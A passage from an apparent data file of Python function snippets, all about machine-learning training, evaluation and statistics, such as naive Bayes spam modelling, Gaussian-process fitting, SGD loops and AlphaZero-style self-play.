self.pb.test_partition[slv+1]\n if slv == 0:\n train_predictions[tr_i1:tr_i2,:] = boosting.get_train_predictions()\n test_predictions[te_i1:te_i2,:] = boosting.get_test_predictions()\n else:\n train_predictions[tr_i1:tr_i2,:] = self.pb.comm.recv(source=slv,tag=11)\n test_predictions[te_i1:te_i2,:] = self.pb.comm.recv(source=slv,tag=12)\n hypotheses = boosting.get_hypotheses()\n np.savez(self.out_fp,\n train_predictions = train_predictions,\n test_predictions = test_predictions,\n hypotheses = hypotheses,\n )\n if not self.pb.testEN and self.isXvalMain:\n train_predictions = np.zeros([self.pb.total_exam_no,self.pb.rounds],\n dtype=\"float32\")\n for slv in np.arange(self.pb.comm_size):\n tr_i1 = self.pb.train_partition[slv]\n tr_i2 = self.pb.train_partition[slv+1]\n if slv == 0:\n train_predictions[tr_i1:tr_i2,:] = boosting.get_train_predictions()\n else:\n train_predictions[tr_i1:tr_i2,:] = self.pb.comm.recv(source=slv,tag=11)\n hypotheses = boosting.get_hypotheses()\n np.savez(self.out_fp,\n train_predictions = train_predictions,\n hypotheses = hypotheses,\n )\n else:\n if self.pb.testEN and self.isXvalMain:\n train_predictions = boosting.get_train_predictions()\n self.pb.comm.send(train_predictions,dest = 0,tag=11)\n test_predictions = boosting.get_test_predictions()\n self.pb.comm.send(test_predictions,dest = 0,tag=12)\n if not self.pb.testEN and self.isXvalMain:\n train_predictions = boosting.get_train_predictions()\n self.pb.comm.send(train_predictions,dest = 0,tag=11)", "def compute_probabilities():\n global total_spam_words, total_ham_words\n total_words = total_spam_words+total_ham_words\n unique_words = len(all_dict)\n print(\"Training Set Description: \")\n len_ham = len(ham_file_list)\n len_spam = len(spam_file_list)\n print(\"SPAM EMAILS: \",len_spam)\n print(\"HAM EMAILS: \",len_ham)\n print(\"Total words: \",total_words)\n print(\"Training...\")\n \n spam_probability = math.log((len_spam)/(len_spam+len_ham))\n ham_probability = math.log((len_ham)/(len_spam+len_ham))\n \n \n \n output_file = open(\"nbmodel.txt\", \"w+\", encoding=\"latin-1\")\n output_file.write(\"model_params \"+str(spam_probability)+\" \"+str(ham_probability)+\"\\n\")\n \n nbmodel = {}\n nbmodel[\"model_params\"] = (spam_probability,ham_probability)\n for word in all_dict.keys():\n spam_count = 1\n if word in spam_dict:\n spam_count+= spam_dict[word]\n \n word_spam_probability = math.log(spam_count / (total_spam_words+unique_words))\n \n ham_count = 1\n if word in ham_dict:\n ham_count+= ham_dict[word]\n \n word_ham_probability = math.log(ham_count / (total_ham_words+unique_words))\n \n output_file.write(word+\" \"+str(word_spam_probability)+\" \"+str(word_ham_probability)+\"\\n\")\n nbmodel[word] = (word_spam_probability, word_ham_probability) \n \n print(\"nbmodel.txt generated successfully...\")\n print(\"SPAM Probability: \",spam_probability)\n print(\"HAM Probability: \",ham_probability)\n output_file.close()", "def fit(self, Y, STATUS, ntop=100, nrecent=100, nmax=400, ntopmu=100, ntopvar=100, nkmeans=300, nkeamnsdata=5000,\n lam=1e-6):\n X = self.X\n untested = [i for i in range(self.n) if STATUS[i] == 0]\n tested = [i for i in range(self.n) if STATUS[i] == 2]\n ytested = Y[tested].reshape(-1)\n self.y_max = np.max(ytested)\n # each 10 fits we update the hyperparameters, otherwise we just update the data which is a lot faster\n if np.mod(self.update_counter, self.updates_per_big_fit) == 0:\n print('fitting hyperparameters')\n # how many training points are there\n ntested = len(tested)\n # if more than nmax we will subsample and use the subsample to fit hyperparametesr\n if ntested > nmax:\n # subsample is uniion of 100 best points, 100 most recent points and then random points \n top = list(np.argsort(ytested)[-ntop:])\n recent = list(range(ntested - nrecent, ntested))\n topandrecent = list(set(top + recent))\n rand = list(\n np.random.choice([i for i in range(ntested) if i not in topandrecent], nmax - len(topandrecent),\n False))\n testedtrain = topandrecent + rand\n ytrain = ytested[testedtrain]\n train = [tested[i] for i in testedtrain]\n else:\n train = tested\n ytrain = ytested\n \n # use GPy code to fit hyperparameters to minimize NLL on train data\n mfy = GPy.mappings.Constant(input_dim=self.d, output_dim=1) # fit dense GPy model to this data\n ky = GPy.kern.RBF(self.d, ARD=True, lengthscale=np.ones(self.d))\n self.GP = GPy.models.GPRegression(X[train], ytrain.reshape(-1, 1), kernel=ky, mean_function=mfy)\n self.GP.optimize('bfgs')\n # strip out fitted hyperparameters from GPy model, because cant do high(ish) dim sparse inference\n self.mu = self.GP.flattened_parameters[0]\n self.a = self.GP.flattened_parameters[1]\n self.l = self.GP.flattened_parameters[2]\n self.b = self.GP.flattened_parameters[3]\n # selecting inducing points for sparse inference \n print('selecting inducing points')\n # get prediction from GPy model \n self.py = self.GP.predict(X)\n # points with 100 highest means\n topmu = [untested[i] for i in np.argsort(self.py[0][untested].reshape(-1))[-ntopmu:]]\n # points with 100 highest uncertatinty\n topvar = [untested[i] for i in np.argsort(self.py[1][untested].reshape(-1))[-ntopvar:]]\n # combine with train set above to give nystrom inducing points (inducing points that are also actual trainingdata points) \n nystrom = topmu + topvar + train\n # also get some inducing points spread throughout domain by using kmeans\n # kmeans is very slow on full dataset so choose random subset \n # also scale using length scales l so that kmeans uses approproate distance measure\n kms = KMeans(n_clusters=nkmeans, max_iter=5).fit(\n np.divide(X[list(np.random.choice(untested, nkeamnsdata))], self.l))\n # matrix of inducing points \n self.M = np.vstack((X[nystrom], np.multiply(kms.cluster_centers_, self.l)))\n # dragons...\n # email james.l.hook@gmail.com if this bit goes wrong!\n print('fitting sparse model')\n DXM = euclidean_distances(np.divide(X, self.l), np.divide(self.M, self.l), squared=True)\n self.SIG_XM = self.a * np.exp(-DXM / 2)\n DMM = euclidean_distances(np.divide(self.M, self.l), np.divide(self.M, self.l), squared=True)\n self.SIG_MM = self.a * np.exp(-DMM / 2) + np.identity(self.M.shape[0]) * lam * self.a\n self.B = self.a + self.b - np.sum(np.multiply(np.linalg.solve(self.SIG_MM, self.SIG_XM.T), self.SIG_XM.T),0)\n K = np.matmul(self.SIG_XM[tested].T, np.divide(self.SIG_XM[tested], self.B[tested].reshape(-1, 1)))\n self.SIG_MM_pos = self.SIG_MM - K + np.matmul(K, np.linalg.solve(K + self.SIG_MM, K))\n J = np.matmul(self.SIG_XM[tested].T, np.divide(ytested - self.mu, self.B[tested]))\n self.mu_M_pos = self.mu + J - np.matmul(K, np.linalg.solve(K + self.SIG_MM, J))\n else:\n K = np.matmul(self.SIG_XM[tested].T, np.divide(self.SIG_XM[tested], self.B[tested].reshape(-1, 1)))\n self.SIG_MM_pos = self.SIG_MM - K + np.matmul(K, np.linalg.solve(K + self.SIG_MM, K))\n J = np.matmul(self.SIG_XM[tested].T, np.divide(ytested - self.mu, self.B[tested]))\n self.mu_M_pos = self.mu + J - np.matmul(K, np.linalg.solve(K + self.SIG_MM, J))\n self.update_counter += 1\n \"\"\" \n key attributes updated by fit \n \n self.SIG_XM : prior covarience matrix between data and inducing points\n self.SIG_MM : prior covarience matrix at inducing points\n \n self.SIG_MM_pos : posterior covarience matrix at inducing points\n self.mu_M_pos : posterior mean at inducing points \n \n \"\"\"", "def compute_statistics(self):", "def _calculateIterations(self):\n #iterations = self.nb_images/self.batchsize\n imgs = self.protofile.nb_test()\n batch = self.protofile.batch_test()\n iterations = imgs/batch\n if imgs % batch != 0:\n iterations += 1\n return iterations", "def test_model(all_data):\n nll = 0\n xent = 0\n step = 0\n for data in jsb.batch_iterator(all_data, FLAGS.batch_size, FLAGS.sequence_length):\n feed = fill_feed(inputs, targets, data)\n\n batch_xent, batch_nll = sess.run([loss_op, nll_op],\n feed_dict=feed)\n\n xent += batch_xent\n nll += batch_nll\n step += 1\n return xent/step, nll/step", "def ann_learning_curve(trainx, trainy, testx, testy, n_hidden=[5, 3],\n\t\t\t\t\t\tn_iter=5, cv=5, train_sizes=np.linspace(.1, 1.0, 10)):\n\n\tcv_train_scores = [[0] * len(train_sizes)]\n\tcv_test_scores = [[0] * len(train_sizes)]\n\tfor c in range(cv):\n\t\ttrain_scores = []\n\t\ttest_scores = []\n\t\tfor ts in train_sizes:\n\t\t\tn_examples = int(round(len(trainx) * ts))\n\t\t\trows = random.sample(range(len(trainx)), n_examples)\n\t\t\tsubx = trainx.iloc[rows, ]\n\t\t\tsuby = trainy.iloc[rows, ]\n\t\t\tstart = time.time()\n\t\t\ta, b = test_ann2(subx, suby, testx, testy,\n\t\t\t\t\t\t\t\tn_hidden=n_hidden, n_iter=n_iter)\n\t\t\tprint(\"training time: {} secs\".format(time.time() - start))\n\t\t\tcurrent_train_score = a\n\t\t\tcurrent_test_score = b\n\t\t\ttrain_scores.append(current_train_score)\n\t\t\ttest_scores.append(current_test_score)\n\t\tcv_train_scores.append(train_scores)\n\t\tcv_test_scores.append(test_scores)\n\taverage_train_scores = [sum(i) / cv for i in zip(*cv_train_scores)]\n\taverage_test_scores = [sum(i) / cv for i in zip(*cv_test_scores)]\n\treturn train_sizes, average_train_scores, average_test_scores", "def sgd(self,\n batch_size=36,\n epsilon=0.16 ,\n epochs=30):\n \n # Compute the number of training examples and number of mini-batches.\n N = min(len(self.trainX), len(self.trainY))\n num_batches = int(N/batch_size)\n\n # Variables to keep track of statistics\n loss_log = []\n test_acc_log = []\n train_acc_log = []\n\n timestamp = time.time()\n timestamp2 = time.time()\n\n predictions_not_shown = True\n \n \n # In each \"epoch\", the network is exposed to the entire training set.\n for t in range(epochs):\n\n # We will order the training data using a random permutation.\n permutation = np.random.permutation(N)\n \n # Evaluate the accuracy on 1000 samples from the training and test data\n test_acc_log.append( self.evaluate(self.testX, self.testY, 1000) )\n print(t)\n print(test_acc_log[t])\n \n if test_acc_log[t]>=0.869:\n break\n \n train_acc_log.append( self.evaluate(self.trainX, self.trainY, 1000))\n print(train_acc_log[t])\n batch_loss = 0\n\n for k in range(num_batches):\n \n # Reset buffer containing updates\n # TODO\n \n # Mini-batch loop\n \n dc_dw = [i*0 for i in self.dw]\n dc_db = [i*0 for i in self.db]\n for i in range(batch_size):\n\n # Select the next training example (x,y)\n x = self.trainX[permutation[k*batch_size+i]]\n y = self.trainY[permutation[k*batch_size+i]]\n\n # Feed forward inputs\n # TODO\n self.forward(x)\n # Compute gradients\n # TODO\n self.backward(x,y)\n \n for l in range(self.L):\n dc_dw[l] =dc_dw[l]+ self.dw[l]\n dc_db[l] =dc_db[l]+ self.db[l] \n\n # Update loss log\n batch_loss += self.loss(self.a[self.L-1], y)\n\n for l in range(self.L):\n self.batch_a[l] += self.a[l] / batch_size\n \n # Update the weights at the end of the mini-batch using gradient descent\n \n \n for l in range(1,self.L):\n \n self.w[l] -=epsilon *(dc_dw[l]/batch_size)\n \n self.b[l] -=epsilon *(dc_db[l]/batch_size)\n \n # Update logs\n loss_log.append( batch_loss / batch_size )\n batch_loss = 0\n \n # Update plot of statistics every 10 seconds.\n if time.time() - timestamp > 10:\n timestamp = time.time()\n fnn_utils.plot_stats(self.batch_a,\n loss_log,\n test_acc_log,\n train_acc_log)\n\n # Display predictions every 20 seconds.\n if (time.time() - timestamp2 > 20) or predictions_not_shown:\n predictions_not_shown = False\n timestamp2 = time.time()\n fnn_utils.display_predictions(self,show_pct=True)\n\n # Reset batch average\n for l in range(self.L):\n self.batch_a[l].fill(0.0)\n return test_acc_log[t-1]", "def calculate_statistics(train_loader, net):\n net.eval()\n\n pred_list = None\n max_class_mean = {}\n print(\"Calculating statistics...\")\n for i, data in enumerate(train_loader):\n inputs = data[0]\n\n inputs = inputs.cuda()\n B, C, H, W = inputs.shape\n batch_pixel_size = C * H * W\n\n with torch.no_grad():\n outputs, _ = net(inputs)\n\n if pred_list is None:\n pred_list = outputs.data.cpu()\n else:\n pred_list = torch.cat((pred_list, outputs.cpu()), 0)\n del outputs\n\n if i % 50 == 49 or i == len(train_loader) - 1:\n pred_list = pred_list.transpose(1, 3)\n pred_list, prediction = pred_list.max(3)\n\n class_max_logits = []\n mean_dict, var_dict = {}, {}\n for c in range(datasets.num_classes):\n max_mask = pred_list[prediction == c]\n class_max_logits.append(max_mask)\n\n mean = class_max_logits[c].mean(dim=0)\n var = class_max_logits[c].var(dim=0)\n\n mean_dict[c] = mean.item()\n var_dict[c] = var.item()\n\n print(f\"class mean: {mean_dict}\")\n print(f\"class var: {var_dict}\")\n np.save(f'stats/{args.dataset[0]}_mean.npy', mean_dict)\n np.save(f'stats/{args.dataset[0]}_var.npy', var_dict)\n\n return None", "def epoch_diagnostics(self, train_loss, train_err, test_loss, test_err):\n m = self.nbatches\n logging.info(\"Epoch diagnostics computation\")\n\n layernum = 0\n layer_gradient_norm_sqs = []\n gavg_norm_acum = 0.0\n gavg_acum = []\n for group in self.param_groups:\n for p in group['params']:\n\n layer_gradient_norm_sqs.append([])\n gavg = self.state[p]['gavg'].cpu()\n gavg_acum.append(gavg.numpy())\n gavg_norm_acum += gavg.norm()**2 #torch.dot(gavg, gavg)\n layernum += 1\n\n gradient_norm_sqs = []\n vr_step_variance = []\n cos_acums = []\n variances = []\n\n for batch_id in range(m):\n norm_acum = 0.0\n ginorm_acum = 0.0\n vr_acum = 0.0\n layernum = 0\n cos_acum = 0.0\n var_acum = 0.0\n for group in self.param_groups:\n for p in group['params']:\n param_state = self.state[p]\n\n gktbl = param_state['gktbl']\n gavg = param_state['gavg'].type_as(p.data).cpu()\n\n gi = gktbl[batch_id, :]\n var_norm_sq = (gi-gavg).norm()**2 #torch.dot(gi-gavg, gi-gavg)\n norm_acum += var_norm_sq\n ginorm_acum += gi.norm()**2 #torch.dot(gi, gi)\n layer_gradient_norm_sqs[layernum].append(var_norm_sq)\n\n gktbl_old = param_state['gktbl_old']\n gavg_old = param_state['gavg_old'].type_as(p.data).cpu()\n gi_old = gktbl_old[batch_id, :]\n #pdb.set_trace()\n vr_step = gi - gi_old + gavg_old\n vr_acum += (vr_step - gavg).norm()**2 #torch.dot(vr_step - gavg, vr_step - gavg)\n cos_acum += torch.sum(gavg*gi)\n\n var_acum += (gi - gavg).norm()**2\n\n layernum += 1\n gradient_norm_sqs.append(norm_acum)\n vr_step_variance.append(vr_acum)\n cosim = cos_acum/math.sqrt(ginorm_acum*gavg_norm_acum)\n #pdb.set_trace()\n cos_acums.append(cosim)\n variances.append(var_acum)\n\n variance = sum(variances)/len(variances)\n\n print(\"mean cosine: {}\".format(sum(cos_acums)/len(cos_acums)))\n\n #pdb.set_trace()\n\n with open('stats/{}fastdiagnostics_epoch{}.pkl'.format(self.test_name, self.epoch), 'wb') as output:\n pickle.dump({\n 'train_loss': train_loss,\n 'train_err': train_err,\n 'test_loss': test_loss,\n 'test_err': test_err,\n 'epoch': self.epoch,\n #'layer_gradient_norm_sqs': layer_gradient_norm_sqs,\n #'gradient_norm_sqs': gradient_norm_sqs,\n #'vr_step_variance': vr_step_variance,\n #'cosine_distances': cos_acums,\n #'variances': variances,\n 'variance': variance,\n #'gavg_norm': gavg_norm_acum,\n #'gavg': gavg_acum,\n #'iterate_distances': self.inrun_iterate_distances,\n #'grad_distances': self.inrun_grad_distances,\n }, output)\n print(\"Epoch diagnostics saved\")\n #pdb.set_trace()\n\n self.inrun_iterate_distances = []\n self.inrun_grad_distances = []", "def measure_rate(net, n_samples=10):\n from scipy.stats import multivariate_normal as mn\n\n dataset_dir, dataset_pth = make_dataset_pths(net)\n print(\"dataset path: \", dataset_pth)\n X, Probes, Change_prob, Perceptual_dist = load_or_make_dataset(\n net, dataset_pth, dataset_dir, net.dataset_size)\n Rx = []\n mu, logsigma = [], []\n i = 0\n while True:\n if i * net.batch_size > len(X) - 1:\n break\n x = X[i * net.batch_size:(i + 1) * net.batch_size]\n m, ls = net.encode_presample(x, keep_session=True)\n mu.append(m)\n logsigma.append(ls)\n i += 1\n mu = np.vstack(mu)\n logsigma = np.vstack(logsigma)\n print(\"Dataset encoded.\")\n z = [\n mn.rvs(mean=mu[j], cov=np.diag(np.exp(logsigma[j])), size=n_samples)\n for j in range(len(mu))\n ]\n p_z_given_x = [\n mn.logpdf(z[j], mean=mu[j], cov=np.diag(np.exp(logsigma[j])))\n for j in range(len(mu))\n ]\n m_z = [\n mn.logpdf(\n z[j], mean=np.zeros(net.latent_size), cov=np.eye(net.latent_size))\n for j in range(len(mu))\n ]\n Rx = [(p_z_given_x[j] - m_z[j]).sum() / n_samples for j in range(len(mu))]\n R = sum(Rx) / len(X)\n print(R)\n return R", "def learn(self):\n epochswin = [] # count the number of wins at every epoch of the network against the preceding version\n epochdraw = [] # count the number of draws at every epoch of the network against the preceding version\n epochswingreedy = [] # count the number of wins against greedy at every epoch\n epochswinrandom = [] # count the number of wins against random at every epoch\n epochsdrawgreedy = [] # count the number of draws against greedy at every epoch\n epochsdrawrandom = [] # count the number of wins against random at every epoch\n epochswinminmax = [] # count the number of wins against minmax at every epoch\n epochsdrawminmax = [] # count the number of draws against minmax at every epoch\n\n\n if self.args.load_model == True:\n file = open(self.args.trainExampleCheckpoint + \"graphwins:iter\" + str(self.args.numIters) + \":eps\" + str(\n self.args.numEps) + \":dim\" + str(self.game.n) + \".txt\", \"r+\")\n lines = file.readlines()\n for index, line in enumerate(lines):\n for word in line.split():\n if index == 0:\n epochswin.append(word)\n elif index == 1:\n epochdraw.append(word)\n file.close()\n\n file = open(self.args.trainExampleCheckpoint + \"graphwins:iter\" + str(self.args.numIters) + \":eps\" + str(\n self.args.numEps) + \":dim\" + str(self.game.n) + \":greedyrandom.txt\", \"r+\")\n lines = file.readlines()\n for index, line in enumerate(lines):\n for word in line.split():\n if index == 0:\n epochswingreedy.append(word)\n elif index == 1:\n epochsdrawgreedy.append(word)\n elif index == 2:\n epochswinrandom.append(word)\n elif index == 3:\n epochsdrawrandom.append(word)\n elif index == 4:\n epochswinminmax.append(word)\n elif index == 5:\n epochsdrawminmax.append(word)\n file.close()\n self.loadTrainExamples()\n\n for i in range(1, self.args.numIters + 1):\n # bookkeeping\n print('------ITER ' + str(i) + '------')\n # examples of the iteration\n iterationTrainExamples = deque([], maxlen=self.args.maxlenOfQueue)\n\n eps_time = AverageMeter()\n bar = Bar('Self Play', max=self.args.numEps)\n end = time.time()\n\n for eps in range(self.args.numEps):\n iterationTrainExamples += self.executeEpisode()\n\n # bookkeeping + plot progress\n eps_time.update(time.time() - end)\n end = time.time()\n bar.suffix = '({eps}/{maxeps}) Eps Time: {et:.3f}s | Total: {total:} | ETA: {eta:}'.format(eps=eps + 1,\n maxeps=self.args.numEps,\n et=eps_time.avg,\n total=bar.elapsed_td,\n eta=bar.eta_td)\n bar.next()\n bar.finish()\n\n # save the iteration examples to the history\n self.trainExamplesHistory.append(iterationTrainExamples)\n\n if len(self.trainExamplesHistory) > self.args.numItersForTrainExamplesHistory:\n print(\"len(trainExamplesHistory) =\", len(self.trainExamplesHistory),\n \" => remove the oldest trainExamples\")\n self.trainExamplesHistory.pop(0)\n # backup history to a file\n # NB! the examples were collected using the model from the previous iteration, so (i-1)\n self.saveTrainExamples(i - 1)\n\n # shuffle examlpes before training\n trainExamples = []\n for e in self.trainExamplesHistory:\n trainExamples.extend(e)\n shuffle(trainExamples)\n\n # training new network, keeping a copy of the old one\n\n filename = \"curent\"+str(i)+\"temp:iter\" + str(self.args.numIters) + \":eps\" + str(self.args.numEps) + \":dim\" + str(\n self.game.n) + \".pth.tar\"\n filenameBest = \"best\" + str(self.args.numIters) + \":eps\" + str(self.args.numEps) + \":dim\" + str(\n self.game.n) + \".pth.tar\"\n\n self.nnet.save_checkpoint(folder=self.args.checkpoint, filename=filename)\n exists = os.path.isfile(filenameBest)\n if exists:\n self.pnet.load_checkpoint(folder=self.args.checkpoint, filename=filenameBest)\n else:\n self.pnet.load_checkpoint(folder=self.args.checkpoint, filename=filename)\n pmcts = MCTS(self.game, self.pnet, self.args)\n\n self.nnet.train(trainExamples)\n nmcts = MCTS(self.game, self.nnet, self.args)\n\n print('PITTING AGAINST PREVIOUS VERSION')\n arena = Arena(lambda x: np.argmax(pmcts.getActionProb(x, temp=0)),\n lambda x: np.argmax(nmcts.getActionProb(x, temp=0)), self.game,nmcts,pmcts,evaluate=True)\n\n pwins, nwins, draws = arena.playGames(self.args.arenaCompare, False)\n\n pmcts.clear()\n nmcts.clear()\n del pmcts\n del nmcts\n\n print(' ')\n print('NEW/PREV WINS : %d / %d ; DRAWS : %d' % (nwins, pwins, draws))\n if i == 1:\n epochswin.append(pwins)\n epochdraw.append(0)\n\n epochswin.append(nwins)\n epochdraw.append(draws)\n self.writeLogsToFile(epochswin, epochdraw)\n\n ''' Get all the players and then pit them against the network. You need to modify here if you implement \n more players\n '''\n (gp, rp, mp) = self.decidePlayers()\n\n if self.args.parallel == 0:\n\n\n nmcts1 = MCTS(self.game, self.nnet, self.args)\n nmcts2 = MCTS(self.game, self.nnet, self.args)\n nmcts3 = MCTS(self.game, self.nnet, self.args)\n\n arenagreedy = Arena(lambda x: np.argmax(nmcts1.getActionProb(x, temp=0)), gp, self.game,nmcts1)\n arenarandom = Arena(lambda x: np.argmax(nmcts2.getActionProb(x, temp=0)), rp, self.game,nmcts2)\n arenaminmax = Arena(lambda x: np.argmax(nmcts3.getActionProb(x, temp=0)), mp, self.game,nmcts3,evaluate=True)\n\n pwinsminmax, nwinsminmax, drawsminmax = arenaminmax.playGames(self.args.arenaCompare)\n print(\"minmax - \"+str(pwinsminmax)+\" \"+str(nwinsminmax)+\" \"+str(drawsminmax))\n pwinsgreedy, nwinsgreedy, drawsgreedy = arenagreedy.playGames(self.args.arenaCompare)\n print(\"greedy - \"+str(pwinsgreedy)+\" \"+str(nwinsgreedy)+\" \"+str(drawsgreedy))\n pwinsreandom, nwinsrandom, drawsrandom = arenarandom.playGames(self.args.arenaCompare)\n print(\"random - \"+str(pwinsreandom)+\" \"+str(nwinsrandom)+\" \"+str(drawsrandom))\n\n nmcts1.clear()\n nmcts2.clear()\n nmcts3.clear()\n del nmcts1\n del nmcts2\n del nmcts3\n\n else:\n '''\n This will be used if you want to evaluate the network against the benchmarks in a parallel way\n '''\n\n self.args.update({'index': str(i)})\n\n p = self.parallel(self.args.arenaCompare)\n (pwinsminmax, nwinsminmax, drawsminmax) = p[0] # self.parallel(\"minmax\", self.args.arenaCompare)\n (pwinsgreedy, nwinsgreedy, drawsgreedy) = p[1] # self.parallel(\"greedy\",self.args.arenaCompare)\n (pwinsreandom, nwinsrandom, drawsrandom) = p[2] # self.parallel(\"random\",self.args.arenaCompare)\n\n epochsdrawgreedy.append(drawsgreedy)\n epochsdrawrandom.append(drawsrandom)\n epochswinrandom.append(pwinsreandom)\n epochswingreedy.append(pwinsgreedy)\n epochswinminmax.append(pwinsminmax)\n epochsdrawminmax.append(drawsminmax)\n\n self.writeLogsToFile(epochswingreedy, epochsdrawgreedy, epochswinrandom, epochsdrawrandom, epochswinminmax,\n epochsdrawminmax, training=False)\n\n if pwins + nwins == 0 or float(nwins) / (pwins + nwins) <= self.args.updateThreshold:\n print('REJECTING NEW MODEL')\n filename = \"curent\"+str(i)+\"temp:iter\" + str(self.args.numIters) + \":eps\" + str(self.args.numEps) + \":dim\" + str(\n self.game.n) + \".pth.tar\"\n filenameBest = \"best\" + str(self.args.numIters) + \":eps\" + str(self.args.numEps) + \":dim\" + str(\n self.game.n) + \".pth.tar\"\n exists = os.path.isfile(filenameBest)\n if exists:\n self.nnet.load_checkpoint(folder=self.args.checkpoint, filename=filenameBest)\n else:\n self.nnet.load_checkpoint(folder=self.args.checkpoint, filename=filename)\n\n else:\n print('ACCEPTING NEW MODEL')\n\n filename = \"best\" + str(self.args.numIters) + \":eps\" + str(self.args.numEps) + \":dim\" + str(\n self.game.n) + \".pth.tar\"\n self.nnet.save_checkpoint(folder=self.args.checkpoint, filename=self.getCheckpointFile(i))\n self.nnet.save_checkpoint(folder=self.args.checkpoint, filename=filename)\n self.mcts.clear()\n del self.mcts\n self.mcts = MCTS(self.game, self.nnet, self.args, mcts=True) # reset search tree\n print(self.tracker.print_diff())\n self.writeLogsToFile(epochswin, epochdraw, training=True)", "def estimate_nb(x,y,smoothing):\n labels = set(y)\n doc_counts = defaultdict(float)\n weights = defaultdict(float)\n\n vocab = set()\n for base_features in x:\n for word in base_features.keys():\n vocab.add(word)\n\n for label in y:\n doc_counts[label] += 1\n\n\n for label in labels:\n weights[(label, OFFSET)] = np.log(doc_counts[label] / sum(doc_counts.values()))\n log_probabilities = estimate_pxy(x, y, label, smoothing, vocab)\n for word in log_probabilities:\n weights[(label, word)] = log_probabilities[word]\n\n return weights", "def train_and_score_bagging(network):\n\n train_predictions = pd.read_pickle('data/train_predictions.pkl.gz', compression='gzip')\n test_predictions = pd.read_pickle('data/test_predictions.pkl.gz', compression='gzip')\n\n train_actuals = pd.read_pickle('data/train_actuals.pkl.gz', compression='gzip')\n test_actuals = pd.read_pickle('data/test_actuals.pkl.gz', compression='gzip')\n\n\n train_x = np.array(train_predictions.values)\n train_y = train_actuals[0].values\n train_log_y = safe_log(train_y)\n test_x = np.array(test_predictions.values)\n test_y = test_actuals[0].values\n test_log_y = safe_log(test_y)\n\n model = compile_model(network)\n\n print('\\rNetwork')\n\n for property in network:\n print(property, ':', network[property])\n logging.info('%s: %s' % (property, network[property]))\n\n test = xgb.DMatrix(test_x)\n train = xgb.DMatrix(train_x, label=train_log_y)\n\n\n\n eval_set = [(test_x, test_log_y)]\n model.fit(train_x, train_log_y, early_stopping_rounds=20, eval_metric='mae', eval_set=eval_set,\n verbose=False)\n\n # eval_set = [(test, test_log_y)]\n # xgb.train(network, train, num_boost_round=5000, evals=eval_set, early_stopping_rounds=5)\n\n predictions = model.predict(test_x)\n # predictions = xgb.predict(test_x)\n inverse_predictions = safe_exp(predictions)\n score = mean_absolute_error(test_y, inverse_predictions)\n mape = safe_mape(test_y, inverse_predictions)\n\n print('\\rResults')\n\n best_round = xgb.best_iteration\n\n if np.isnan(score):\n score = 9999\n\n print('best round:', best_round)\n print('loss:', score)\n print('mape:', mape)\n print('-' * 20)\n\n logging.info('best round: %d' % best_round)\n logging.info('loss: %.4f' % score)\n logging.info('mape: %.4f' % mape)\n logging.info('-' * 20)\n\n eval_results({'xgb_predictions': {\n 'actual_y': test_y,\n 'y_predict': inverse_predictions\n }\n })\n\n range_results({\n 'xgb_predictions': inverse_predictions,\n }, test_y)", "def train(self, data, labels, validationData, validationLabels):\n \n # -- calls the classify method to evaluate performance \n # -- OUR CODE HERE\n \n legalLabels = labels\n self.legalLabels = legalLabels\n trainingData = validationData\n trainingLabels = validationLabels\n \n kCorrect = util.Counter()\n self.conditionalProb = []\n \n \n self.prior = util.Counter()\n for label in labels:\n self.prior[label] += 1.0\n self.prior.normalize()\n #for label in self.prior:\n # self.prior[label]/=len(trainingLabels)\n \n \"\"\"\n print \"legal labels are \", len(legalLabels)\n print \"kgrid is \", kgrid\n print \"the legal labels are.... \", legalLabels\n \"\"\"\n \n import time\n \n condprobForK = {}\n \n # -- iterate through each k in kgrid... should we be doing this?\n # -- won't this affect the cond prob tables? :(\n k = 0.5\n #print \"working on k = \",k,\" in kgrid\"\n \n # -- reset the conditonal prob table\n # -- each time we go through a different k...\n self.conditionalProb = {}\n \n # -- go through each label and initialize the Counter for that label (the cond prob table)\n for label in legalLabels:\n self.conditionalProb[label] = util.Counter()\n \n # -- go through each piece of training data and train the tables on it \n for dataNum in range(len(trainingData)):\n \n # -- identify which label we're using... not sure if this is correct\n label = trainingLabels[dataNum] # 0 or like 9 or 2\n \n # -- iterate through each pixel and update the conditional prob counter for that label\n for pixel in trainingData[dataNum]:\n \n if pixel is \"moreThanOneConnBlackRegions\":\n #print \"Number is :: \", label, \" and has \", trainingData[dataNum][pixel]\n assert 1 is 1\n \n on_off = trainingData[dataNum][pixel] * 1.0\n self.conditionalProb[label][pixel] += on_off * 1.0\n \n # -- now we go through and add k to each of the conditional probabilities\n # -- note that we do so for each label and every single pixel\n for label in legalLabels:\n for pixel in self.conditionalProb[label]: \n # -- add the k value \n self.conditionalProb[label][pixel] += k * 1.0\n assert self.conditionalProb[label][pixel] >= k # -- sanity check that it should be at least k\n self.conditionalProb[label][pixel] /= (self.prior[label] * len(trainingLabels) + k*2)\n \n \n \n # -- END OUR CODE", "def train_predict(self, xTrain, yTrain, xTest, yTest):\n trainStats = {}\n # TODO: DO SGD\n #beta = np.linalg.inv(xTrain.transpose().dot(xTrain)).dot(xTrain.transpose()).dot(yTrain)\n LinearRegression.beta = [[0],[0]]\n intercept = 0\n n = len(xTrain)\n startall = time.time()\n list = [x for x in range(0,len(xTrain))]\n for i in range(self.mEpoch):\n random.shuffle(list)\n Dbetalist = []\n Dinterceptlist = []\n start = time.time()\n for j in range(self.bs):\n # Dbetalist = []\n # Dinterceptlist = []\n indexstart = len(list)/self.bs * j\n indexend = len(list)/self.bs * j + len(list)/self.bs\n subset = xTrain[int(indexstart):int(indexend)]\n #print(subset)\n ypredict = np.dot(subset,LinearRegression.beta) + intercept\n subyTrain = yTrain[int(indexstart):int(indexend)]\n Dbeta = (-2/n)*sum(np.dot(subset.transpose(),(subyTrain-ypredict)))\n Dbetalist.append(Dbeta)\n Dintercept = (-2/n)*sum(subyTrain-ypredict)\n Dinterceptlist.append(Dintercept)\n\n end = time.time()\n timeElapse = end - start\n\n avgDbeta = sum(Dbetalist) / len(Dbetalist)\n avgDintercept = sum(Dinterceptlist) / len(Dinterceptlist)\n #print(avgDbeta)\n # print(avgDintercept)\n LinearRegression.beta = LinearRegression.beta - self.lr * avgDbeta\n #print(LinearRegression.beta)\n # print(beta)\n intercept = intercept - self.lr * avgDintercept\n\n value = {}\n value['time'] = timeElapse\n value['train-mse'] = LinearRegression.mse(LinearRegression, xTrain, yTrain)\n value['test-mse'] = LinearRegression.mse(LinearRegression, xTest, yTest)\n trainStats[i*self.bs] = value\n\n endall = time.time()\n totaltime = endall - startall\n\n\n return trainStats", "def compute_metrics(self, train_data, test_data, criterion):\n m = 